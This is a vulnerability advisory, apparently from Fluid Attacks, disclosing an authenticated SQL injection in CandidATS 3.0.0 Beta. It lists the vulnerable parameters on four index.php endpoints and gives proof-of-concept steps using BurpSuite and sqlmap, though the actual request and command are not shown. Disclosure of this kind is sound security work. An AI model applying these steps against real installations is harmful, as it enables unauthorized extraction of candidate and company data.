CandidATS 3.0.0 - Authenticated SQL Injection
6,3
Medium
Discovered by
Offensive Team, Fluid Attacks
Summary
Full name
CandidATS 3.0.0 - Authenticated SQL Injection
Code name
State
Public
Release date
19 jul 2022
Affected product
CandidATS
Affected version(s)
Version 3.0.0 Beta (Pilava Beta)
Vulnerability name
SQL injection
Vulnerability type
Remotely exploitable
Yes
CVSS v3.1 vector string
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
CVSS v3.1 base score
6.3
Exploit available
No
CVE ID(s)
Description
CandidATS Version 3.0.0 Beta allows an authenticated user to inject SQL queries in /index.php?m=settings&a=show via the userID parameter, in /index.php?m=candidates&a=show via the candidateID, in /index.php?m=joborders&a=show via the jobOrderID and /index.php?m=companies&a=show via the companyID parameter
Proof of Concept
Log in to CandidATS with a user who has permissions to read job orders, candidates or companies.
Go to
index.php?m=joborders(or any of the option above).Uncheck the
Only My Companiesoption.Select any of the items listed and intercept the request with BurpSuite.
It is possible to inject sql sentences inside the companyID parameter, for example, the following request will make the database sleep for 5 seconds.
Save the intercepted request into a file.
Run the following command from sqlmap in order to extract information from the database.
Exploit
It is possible to use sqlmap in order to extract information from the database
Mitigation
This information will be released later according to our Responsible Disclosure Policy.
References
Vendor page https://candidats.net/forums/
Timeline
IA generativa
19 abr 2022
Vendor Confirmed Vuln.
20 abr 2022
Vendor contacted
19 abr 2022
Vendor replied
20 abr 2022
Public disclosure
19 jul 2022
